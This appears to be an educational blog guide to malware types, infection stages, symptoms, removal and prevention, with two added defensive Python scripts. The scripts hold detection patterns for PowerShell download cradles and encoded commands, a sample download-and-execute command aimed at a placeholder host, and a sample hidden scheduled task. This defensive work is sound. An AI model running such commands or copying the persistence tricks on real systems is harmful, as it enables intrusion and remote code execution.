What Is Malware? 7 Types, How It Works & How Hackers Use It (2026)

In early 2025, a new malware family called PROMPTFLUX was observed actively querying large language models mid-execution — using AI to generate custom evasion code on the fly in response to the specific security software it detected on each infected machine. When PROMPTFLUX encountered Windows Defender, it asked an LLM how to evade Windows Defender specifically, and implemented the response in real time. When it encountered a different endpoint product, it adapted accordingly. Traditional signature-based detection, which works by recognising known malware patterns, was useless against malware that rewrites itself differently for each target.

That is 2026-era malware. But understanding it requires understanding the full spectrum — from the decades-old foundations to the AI-powered variants emerging today. This guide covers every malware type, how each works technically, real attack examples, and exactly what you can do to protect against each one.

The malware landscape in 2026: Over 560,000 new malware samples are detected every day. Malware caused over $6 trillion in global damages in 2025. AI-powered malware families that actively query LLMs for evasion tactics are now confirmed in the wild (PROMPTFLUX, PROMPTSTEAL — Mandiant M-Trends 2026). Fileless malware, which lives entirely in memory and leaves no files on disk, now accounts for more than 50% of advanced attacks.

Quick Navigation:
  1. What malware is — and why "virus" is the wrong word for most of it
  2. How malware infects a system — the full infection chain
  3. Every malware type explained with real examples
  4. Fileless malware — the most dangerous modern variant
  5. AI-powered malware — the 2026 escalation
  6. Signs your device is infected — what to look for
  7. How to remove malware — step-by-step
  8. Prevention — how to avoid infection in the first place

What Malware Is — And Why "Virus" Is the Wrong Word for Most of It

Malware (malicious software) is any software designed to damage, disrupt, gain unauthorised access to, or perform unwanted actions on a computer system, network, or device — without the owner's knowledge or consent.

The word "virus" is colloquially used to mean all malware, but a virus is actually one specific category with specific characteristics (self-replication by attaching to existing files). Modern attacks rarely use traditional viruses. They use trojans, spyware, ransomware, rootkits, and increasingly fileless and AI-powered variants that are far more sophisticated and harder to detect than the viruses of the 1990s and 2000s.

Understanding the specific type of malware matters because each type has different infection methods, different behaviours on the infected system, different goals, and different removal requirements. A rootkit requires a completely different response from a browser hijacker, even though both are "malware."

How Malware Infects a System — The Full Infection Chain

A Typical Modern Malware Infection — Step by Step

1. Delivery: The malware reaches the target system via a phishing email attachment, a malicious download link, a compromised website (drive-by download), an infected USB drive, a malicious advertisement (malvertising), or a supply chain compromise (malware hidden in a legitimate software update). The delivery method is almost always social engineering — getting a person to take an action that initiates the infection.

2. Execution: The malicious code runs. This might require the user to open a file (macro-enabled Office document, a fake PDF, an executable disguised as a legitimate file), or it might happen automatically through a browser vulnerability exploited by a malicious webpage (drive-by download).

3. Establishment: The malware establishes persistence — a mechanism to survive a reboot. Methods include: adding registry entries, creating scheduled tasks, modifying startup folders, or installing a service. At this stage, the malware will reload automatically every time the system restarts.

4. Command and Control (C2): The malware contacts a remote server controlled by the attacker — called a C2 or C&C server. This connection allows the attacker to send commands, receive stolen data, and update the malware. C2 communication is often disguised as normal HTTPS traffic to avoid detection.

5. Payload execution: The malware performs its primary function — stealing credentials, encrypting files, logging keystrokes, mining cryptocurrency, providing remote access, exfiltrating data, or spreading to other systems on the same network. This is the phase that produces visible damage or enables further attacks.

Every Malware Type Explained — With Real Examples

Virus (classic type)

A virus attaches itself to a legitimate file and replicates when that file is executed or shared — like a biological virus that needs a host cell. When an infected file runs, the virus code runs too, infecting additional files on the same system. Viruses spread to other computers when infected files are shared (email attachments, USB drives, file sharing). Traditional viruses are less common in modern attacks because they require a host file to execute and are reliably detected by signature-based antivirus software.

How it infects: Attaches to executable files (.exe, .com), macro-enabled documents, or boot sectors. Activates when the infected file is opened or the infected drive is booted from.
Historic example: The ILOVEYOU virus (2000) spread via email as a "love letter" attachment. It overwrote files, spread through Outlook address books, and infected 10% of internet-connected computers worldwide within days — causing approximately $10 billion in damage. Simple by modern standards but devastating at a time before widespread antivirus adoption.

Trojan, or Trojan Horse (the most common attack tool)

A trojan disguises itself as legitimate, useful software to trick users into installing it. Unlike a virus, it does not self-replicate — it relies on social engineering to spread. Once installed, it performs malicious actions hidden from the user: opening backdoors for remote access, downloading additional malware, stealing credentials, or providing a foothold for further attacks. Trojans are the most common malware type used in targeted attacks because they can be customised to specific objectives and disguised as any type of software.

How it infects: User downloads and runs what appears to be a legitimate application — a cracked game, a free utility, a fake browser update, or a document with an embedded trojan. The legitimate-looking front-end may actually work while the malicious payload operates silently in the background.
Real example: Emotet began as a banking trojan in 2014, evolved into a modular malware distribution platform, and became the world's most dangerous malware by 2021. It spread via phishing emails containing malicious Word documents with macros. Once installed, Emotet downloaded additional payloads — often TrickBot (credential stealer) followed by Ryuk ransomware — turning a single email click into a full ransomware incident. Europol called its takedown in 2021 "the world's most dangerous malware operation."

Spyware (spies on you)

Spyware secretly monitors user activity and sends collected data to the attacker. It operates without the user's knowledge or consent, harvesting information over time rather than causing immediate visible damage. Types range from commercial-grade spyware marketed as "parental monitoring" software to sophisticated nation-state tools that intercept encrypted communications. The defining characteristic is covert observation and data exfiltration without the user's awareness.

How it infects: Often bundled with free software (adware bundles), installed through browser exploits, delivered via phishing, or in some high-value cases, installed through zero-click exploits that require no user interaction at all (as with Pegasus).
Real example: NSO Group's Pegasus spyware — used by governments against journalists, activists, and executives — was installed on targets' phones through zero-click iMessage vulnerabilities (requiring no user action). Once installed, it exfiltrated all messages, calls, emails, photos, and location data. An investigation by Amnesty International and Forbidden Stories found Pegasus was used to target at least 1,400 journalists and activists globally, including the associates of murdered journalist Jamal Khashoggi.

Keylogger (captures every keystroke)

Records every keystroke the user types and sends the log to the attacker. This captures usernames, passwords, credit card numbers, personal messages, and anything else typed on the keyboard. Keyloggers may be software-based (installed on the operating system) or hardware-based (physical devices attached between the keyboard and computer, often used in corporate espionage or targeted attacks on specific workstations).

How it infects: Software keyloggers are installed via trojans, phishing attachments, or drive-by downloads. They typically hook into the Windows API to intercept keystrokes at the OS level before encryption is applied — meaning even HTTPS-encrypted communications are vulnerable because the keylogger captures text before it is encrypted.
Real example: Agent Tesla is a widely-used commercial keylogger and remote access trojan (RAT) that first appeared in 2014 and remains one of the most prevalent credential-stealing malware families in 2026. It is sold as Malware-as-a-Service, deployed primarily through phishing emails with malicious Office attachments, and is particularly common in attacks against small businesses and supply chain partners. It captures keystrokes, screenshots, clipboard data, and stored browser credentials.

Rootkit (hardest to remove)

A rootkit conceals itself and other malicious software from the operating system and security tools by modifying the OS itself at a fundamental level. Once installed, a rootkit can hide processes, files, registry entries, and network connections — making other malware running on the system effectively invisible. The name comes from "root" (administrator) access on Unix systems. Rootkits are the most technically sophisticated malware and the hardest to remove — because the tools you would use to detect them are themselves running on an OS that the rootkit controls.

How it infects: Requires administrator-level access to install — typically achieved through an exploit or after a trojan establishes initial access and escalates privileges. Kernel-level rootkits modify the operating system kernel directly. Bootkit variants infect the master boot record, loading before the OS itself.
Real example: The Sony BMG rootkit scandal (2005) — Sony embedded rootkit technology in 22 million music CDs to prevent copying. The rootkit hid itself from Windows, ran constantly in the background, and — critically — could be exploited by third-party malware authors to hide their own malware under Sony's hidden directory. Security researcher Mark Russinovich discovered it; Sony faced massive backlash and class-action lawsuits. It demonstrated that rootkit techniques are not purely criminal — they are also used by corporations for DRM purposes, raising significant ethical concerns.

Worm (self-spreading)

Unlike a virus, a worm does not need a host file — it is a self-contained, self-replicating program that spreads across networks without user interaction. Worms exploit vulnerabilities in network services, operating systems, or applications to propagate automatically from machine to machine. A single infected system on a corporate network can infect thousands of other systems within hours through automated scanning and exploitation. Worms often carry a secondary payload — they may spread ransomware, install backdoors, or form botnets.

How it infects: Exploits network-accessible vulnerabilities. Scans for other vulnerable systems and replicates itself automatically. The WannaCry worm spread through the EternalBlue exploit (SMB vulnerability) — a single unpatched internet-facing machine could infect every unpatched machine on the same network in minutes.
Real example: WannaCry (2017) infected 230,000 computers in 150 countries in a single day, including 80 NHS hospital trusts in the UK (forcing cancellation of 19,000 appointments). It used the NSA-developed EternalBlue exploit, leaked by the Shadow Brokers group. Damage exceeded $4 billion globally. The patch for the exploited vulnerability had been available for two months — every WannaCry infection was a preventable failure to patch.

Fileless Malware (modern and dangerous)

Fileless malware operates entirely in system memory (RAM) and uses legitimate operating system tools to carry out malicious actions — never writing a file to disk. Because traditional antivirus software detects malware by scanning files, fileless malware is invisible to most signature-based security tools. It loads into memory through an existing process (typically a browser, document viewer, or system utility), executes its payload, and may disappear entirely when the system is rebooted — leaving minimal forensic evidence.

How it infects: Exploits vulnerabilities in browsers or document viewers to execute shellcode in memory, or uses PowerShell, WMI, or the Windows Registry to execute commands without dropping files. Often delivered through malicious macros or browser exploits that execute code directly in memory.
Real example: The Lazarus Group (North Korean state-sponsored) used fileless malware techniques throughout their financial system attacks in 2025-2026, including in the preparation stages of the $1.5 billion Bybit theft. Their tools used legitimate Windows processes to execute malicious code, making detection extremely difficult. Mandiant's M-Trends 2026 report notes fileless techniques are now present in more than 50% of advanced persistent threat (APT) intrusions.
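Because fileless tooling never drops a file, the most useful evidence is the command line or script block that the interpreter itself logged. The script below is an added example for this guide (not from the original post or any vendor): it runs a small set of indicators, in the spirit of public detection rules, over constructed PowerShell log lines, and decodes any -EncodedCommand argument so the hidden payload is inspected too. The sample events and the placeholder.invalid URL are invented.

```python
"""Triage PowerShell command lines / script blocks for fileless-execution indicators.

Added example for this guide. The indicator list is a minimal starting set, not a
complete signature database, and the sample events are constructed.
"""
import base64
import binascii
import re

# (label, pattern) pairs; matching is case-insensitive because PowerShell is.
INDICATORS = [
    ("encoded command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("dynamic evaluation", re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)),
    ("download cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I)),
    ("in-memory loading", re.compile(r"Reflection\.Assembly\]::Load|FromBase64String|VirtualAlloc", re.I)),
]


def decode_encoded_command(text):
    """Return the plaintext of a -EncodedCommand argument, or None if absent or undecodable.

    PowerShell expects base64 of UTF-16LE text, so that is exactly what is reversed here.
    """
    match = INDICATORS[0][1].search(text)
    if not match:
        return None
    blob = match.group(0).split()[-1]
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(text):
    """Return the indicators found in one logged line, including inside any decoded payload."""
    hits = [label for label, pattern in INDICATORS if pattern.search(text)]
    decoded = decode_encoded_command(text)
    if decoded:
        hits += ["decoded:" + label for label, pattern in INDICATORS if pattern.search(decoded)]
    return {"text": text, "decoded": decoded, "indicators": hits, "score": len(hits)}


def triage(events):
    """Return the analysis of every event that carries at least one indicator."""
    return [result for result in map(analyze, events) if result["score"] > 0]


# Constructed sample events in the style of PowerShell command-line / script-block
# logging. The encoded payload is built here from a placeholder string so the
# sample is self-describing rather than a pasted blob.
_STAGED = "IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage2')"
_ENCODED = base64.b64encode(_STAGED.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + _ENCODED,
    "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')",
    "Get-WmiObject Win32_Process | Select-Object Name, ProcessId",
]

if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(f"score {result['score']}: {', '.join(result['indicators'])}")
        if result["decoded"]:
            print("  decoded payload:", result["decoded"])
```

Administrators' own scripts also use Invoke-Expression and web requests, so treat the score as a prioritisation aid and check the parent process and the user context before acting.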

AI-Powered Malware (the 2026 frontier)

The newest and most concerning category. AI-powered malware uses large language models (LLMs) to dynamically adapt its behaviour, evade detection, and improve its own effectiveness during execution. Mandiant confirmed the existence of two AI-querying malware families in M-Trends 2026: PROMPTFLUX (queries LLMs mid-execution to generate evasion code specific to the detected security software) and PROMPTSTEAL (uses LLMs to identify and extract credentials and configuration files based on the specific environment it finds itself in). The QUIETVAULT credential stealer was observed executing predefined prompts against local AI command-line tools on infected machines to locate configuration files.

How it infects: Initial infection via standard vectors (phishing, exploits). The AI component activates post-infection, using the infected machine's internet connection or local AI tools to query LLMs for targeted assistance. This represents a fundamental shift — malware that improves itself in response to the specific defences it encounters, rather than following a predetermined script.
Implications: Traditional signature-based and behaviour-based detection both struggle against AI-powered malware because it behaves differently on every machine. This is why Mandiant's 2026 report emphasises moving from pattern-based detection to anomaly detection — identifying that something unusual is happening, rather than recognising a specific known-bad pattern.

Signs Your Device May Be Infected With Malware

  • Unexplained slowness or high CPU/memory usage — especially if a specific process you don't recognise is consuming resources (cryptomining malware, spyware)
  • Browser behaviour changes — new homepage or search engine you didn't set, new toolbars or extensions, redirects to unexpected websites (browser hijacker, adware)
  • Security software disabled or won't start — many malware types disable antivirus as a first step after infection (rootkits, advanced trojans)
  • Unusual network activity — high outbound traffic when you're not using the internet, connections to unknown IP addresses (C2 communication, data exfiltration)
  • Files encrypted or inaccessible — the most visible sign of ransomware (covered in the ransomware guide)
  • Accounts logged into from unexpected locations — indicates credential theft by a keylogger or spyware
  • Unexpected pop-ups or advertisements — even outside the browser (adware)
  • Your contacts receive strange messages from you — indicates your email or social media accounts have been compromised, possibly by a worm spreading itself

Important: The absence of these signs does not mean a device is clean. Sophisticated malware is specifically designed to be invisible — rootkits, fileless malware, and advanced spyware can operate for months without any visible symptom. If you have reason to believe a device is compromised (you clicked a suspicious link, opened an unexpected attachment, or your credentials appeared in a breach), investigate proactively rather than waiting for symptoms.

How to Remove Malware — Step by Step

1. Disconnect From the Network

Immediately disconnect the infected device from the internet and from any internal network. Disable WiFi, unplug ethernet. This stops data exfiltration, cuts C2 communication, and prevents network-spreading worms from infecting other devices. Do not reconnect until the device is confirmed clean.

2. Boot Into Safe Mode

Safe Mode loads Windows with only essential drivers and processes — most malware does not load in Safe Mode because it runs as an optional service or startup program. Performing the scan in Safe Mode prevents the malware from actively interfering with detection and removal. On Windows: restart, hold Shift while clicking Restart, then Troubleshoot > Advanced Options > Startup Settings > Restart > Safe Mode with Networking.

3. Run a Dedicated Malware Scanner

Your regular antivirus may have been compromised or may not detect the specific malware. Use a second-opinion scanner: Malwarebytes Free, HitmanPro, or Microsoft's standalone Malicious Software Removal Tool (MSRT). These tools use different detection engines and may catch what your primary tool missed. Run a full system scan, not a quick scan.

4. Check Startup Programs and Scheduled Tasks

Open Task Manager > Startup tab and Process Monitor (Sysinternals) to identify any suspicious processes or startup entries. Review scheduled tasks (Task Scheduler) for any unknown entries. Many malware families achieve persistence through these mechanisms. Research any unfamiliar entry names before disabling them.

5. Change All Passwords From a Clean Device

Assume any password typed on the infected device has been captured by a keylogger. Change all passwords — especially email, banking, social media, and work accounts — from a different, uninfected device. Do this after the infected device has been cleaned, not before; otherwise a keylogger may capture your new passwords too. Enable MFA on all accounts if not already active.

6. For Severe Infections: Wipe and Reinstall

For rootkits, bootkits, fileless malware, or any infection where you cannot be certain of complete removal: the safest approach is a full wipe and OS reinstallation from a known-clean source. Backup data to an external drive (scan the backup), format the drive, reinstall the OS, restore data, and reinstall applications. Time-consuming but the only guarantee of a clean system for severe infections.
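Step 4 (reviewing startup entries and scheduled tasks) is where most people stall, because a list of fifty autorun entries gives no hint which ones deserve attention. The script below is an added example for this guide (not from the original post): it scores a constructed inventory of Run keys, scheduled tasks and startup-folder items against the persistence patterns this guide describes, such as executables living in user-writable folders, system-binary names outside the Windows directory, script interpreters launched at boot, and document-looking names with an executable extension. The inventory format and all entry names are invented.

```python
"""Score autorun entries for the persistence patterns described in this guide.

Added example for this guide. The inventory below is constructed; in practice
you would feed it the Run keys, scheduled tasks and startup folders you exported.
"""
import re

USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData|Downloads)\\", re.I)
SYSTEM_NAMES = {"svchost.exe", "lsass.exe", "csrss.exe", "explorer.exe", "winlogon.exe", "services.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe",
                "rundll32.exe", "regsvr32.exe", "cmd.exe"}
HIDDEN_OR_ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s|-w(?:indowstyle)?\s+hidden|https?://", re.I)
DOUBLE_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?|jpe?g|png|txt)\.(?:exe|scr|com|bat|cmd|js|vbs)\b", re.I)

# Constructed inventory, one entry per line: source|name|command
SAMPLE_AUTORUNS = r"""
HKLM\Software\Microsoft\Windows\CurrentVersion\Run|SecurityHealth|C:\Windows\System32\SecurityHealthSystray.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Run|OneDrive|"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
HKCU\Software\Microsoft\Windows\CurrentVersion\Run|WindowsUpdate|C:\Users\alice\AppData\Roaming\svchost.exe
Task Scheduler|ScheduledDefrag|%windir%\system32\defrag.exe -c -h -o
Task Scheduler|SysHelper|powershell.exe -w hidden -enc SQBFAFgAIAAoAE4A
Startup folder|report.pdf.lnk|C:\Users\Public\report.pdf.exe
"""


def executable_of(command):
    """Return the program path from a command line, honouring a quoted first token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def score_entry(source, name, command):
    """Weigh the persistence red flags in one entry; 0 = nothing notable, 1 = review, 2+ = suspicious."""
    exe = executable_of(command)
    base = exe.rsplit("\\", 1)[-1].lower()
    reasons = []
    if USER_WRITABLE.search(exe):
        reasons.append(("runs from a user-writable location", 1))
    if base in SYSTEM_NAMES and "\\windows\\" not in exe.lower():
        reasons.append(("system binary name outside the Windows directory", 2))
    if base in INTERPRETERS:
        reasons.append(("script interpreter launched at startup", 1))
        if HIDDEN_OR_ENCODED.search(command):
            reasons.append(("hidden window, encoded command or URL in arguments", 2))
    if DOUBLE_EXT.search(exe):
        reasons.append(("document-looking name with an executable extension", 2))
    score = sum(weight for _, weight in reasons)
    verdict = "suspicious" if score >= 2 else "review" if score == 1 else "benign-looking"
    return {"source": source, "name": name, "command": command, "score": score,
            "verdict": verdict, "reasons": [reason for reason, _ in reasons]}


def triage(inventory_text):
    """Parse a source|name|command inventory and score every entry, highest score first."""
    results = []
    for line in inventory_text.strip().splitlines():
        source, name, command = line.split("|", 2)
        results.append(score_entry(source, name, command))
    return sorted(results, key=lambda entry: entry["score"], reverse=True)


if __name__ == "__main__":
    for entry in triage(SAMPLE_AUTORUNS):
        print(f"[{entry['verdict']:>14}] {entry['name']:<16} {entry['command']}")
        for reason in entry["reasons"]:
            print(f"{'':17}- {reason}")
```

A score of 1 is common for legitimate per-user software (OneDrive installs under AppData, for example), which is why the guide says to research unfamiliar names before disabling anything.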

Prevention — How to Avoid Malware Infection

Malware Prevention Checklist

  1. Keep everything updated. The OS, browsers, browser plugins, and all installed software. The majority of drive-by downloads and worm propagations exploit known, patched vulnerabilities. Unpatched systems are the primary attack surface for automated malware campaigns.
  2. Never open email attachments or links without verifying the sender. Malware delivery is dominated by phishing emails. No legitimate service will send you an attachment you didn't request. Apply the SLAM method from the phishing guide to every unexpected email.
  3. Only download software from official sources. Pirated software, cracked applications, and unofficial download sites are the primary distribution vector for trojans. The risk of malware in pirated software is not theoretical — it is near-certain for popular titles.
  4. Use a reputable endpoint security product and keep it updated. No tool provides complete protection, but modern EDR (Endpoint Detection and Response) products detect behavioural anomalies that signature-based tools miss. Free options (Windows Defender, Malwarebytes Free) provide meaningful protection. Paid EDR solutions add behavioural analysis, memory scanning, and threat hunting capabilities.
  5. Enable a firewall and review outbound traffic rules. A host-based firewall that blocks unexpected outbound connections can detect C2 communication — a malware-infected machine suddenly attempting to connect to unusual IP addresses on unusual ports is a detectable signal.
  6. Disable macros in Office documents by default. Macro-enabled Office documents remain one of the most common malware delivery mechanisms. Default macro settings in Office should block macros from running in documents received from email or the internet. Enable macros only for documents from trusted sources where you can verify the need.
  7. Back up data regularly to an offline location. Backups do not prevent malware infection, but they remove the leverage ransomware has over you and allow recovery from destructive malware. Follow the 3-2-1 backup rule as described in the ransomware protection guide.
  8. Be suspicious of any USB drive you didn't personally purchase and insert. Never plug in a USB drive you found, received unexpectedly, or cannot trace to a verified source. The baiting technique in social engineering exploits exactly this scenario.

About the Author

Amardeep Maroli

MCA student and cybersecurity enthusiast from Kerala, India. I focus on API security, ethical hacking, and secure application development. I build practical guides from hands-on experience — not just textbook definitions.

Malware FAQs

What is the difference between a virus and malware?
Malware is the umbrella term for all malicious software — it includes viruses, trojans, ransomware, spyware, worms, rootkits, and every other malicious software category. A virus is one specific type of malware with a specific characteristic: it self-replicates by attaching to and infecting other files, spreading when infected files are executed or shared. Saying "my computer has a virus" when it actually has a trojan or ransomware is like saying "I have a cold" when you actually have the flu — both are illnesses, but they're different and require different treatments. The distinction matters practically because different malware types require different detection methods and removal procedures.
Can malware infect a phone or tablet?
Yes — mobile malware is a significant and growing threat on both Android and iOS. Android is more vulnerable because it allows sideloading (installing apps from outside the official Play Store) and has a more fragmented update ecosystem. Common mobile malware types include banking trojans that overlay fake screens over real banking apps to steal credentials, spyware that accesses the microphone and camera, SMS interceptors that steal two-factor authentication codes, and ransomware. iOS is less vulnerable due to its closed ecosystem and strict App Store review, but zero-click spyware like Pegasus has demonstrated that even fully-patched iOS devices can be compromised. Keep your phone's OS and apps updated, only install apps from official stores, and be cautious of any app requesting permissions it doesn't need.
Does antivirus software protect against all malware?
No — antivirus software significantly reduces risk but cannot provide complete protection. Traditional signature-based antivirus recognises known malware by matching against a database of known-bad patterns. It is blind to: zero-day malware (never-before-seen variants), fileless malware (nothing written to disk to scan), heavily obfuscated or packed malware, and AI-powered malware that modifies itself to evade known signatures. Modern endpoint detection and response (EDR) tools add behavioural analysis — detecting suspicious activity patterns regardless of whether the specific malware is known — which is more effective against advanced threats. But no tool replaces good security hygiene: keeping software patched, being suspicious of unsolicited attachments, and using unique strong passwords with MFA.
What is Malware-as-a-Service and why does it matter?
Malware-as-a-Service (MaaS) operates on the same model as legitimate software-as-a-service — malware developers build the malware, maintain it, and provide it to customers (other criminals) for a subscription fee or revenue share, rather than using it themselves. Examples include keyloggers like Agent Tesla, ransomware platforms like LockBit and Qilin, and stealers like RedLine and Raccoon. MaaS dramatically lowers the technical barrier to conducting malware attacks — someone with no programming ability can deploy sophisticated, enterprise-grade malware by paying a subscription and following instructions. This is a major reason why attack volumes have increased so dramatically: the supply of capable malware is no longer limited by the number of skilled malware developers.
How do I know if a website is infected with malware (a watering hole)?
This is genuinely difficult because a watering hole attack compromises a legitimate, trusted website — it looks exactly as it normally does. Technical indicators that something may be wrong: your browser flags an unexpected security certificate change, browser security tools like Google Safe Browsing display a warning, the site's load time is noticeably different, or your security software flags an outbound connection attempt immediately after visiting. The most reliable defence is not detection but prevention: keep your browser fully updated (patches close the vulnerabilities that drive-by downloads exploit), use browser isolation for high-risk browsing, and have endpoint security that monitors for unusual process behaviour after a web visit. For very high-security environments, consider using a sandboxed browser that runs in an isolated environment and cannot affect the main OS.

Found this useful? Share the prevention checklist with anyone who still thinks antivirus alone is sufficient protection. The landscape has changed significantly and most people's mental model of malware is 10 years out of date.

Have you dealt with a malware infection? What type was it and how did you detect it? Share in the comments.
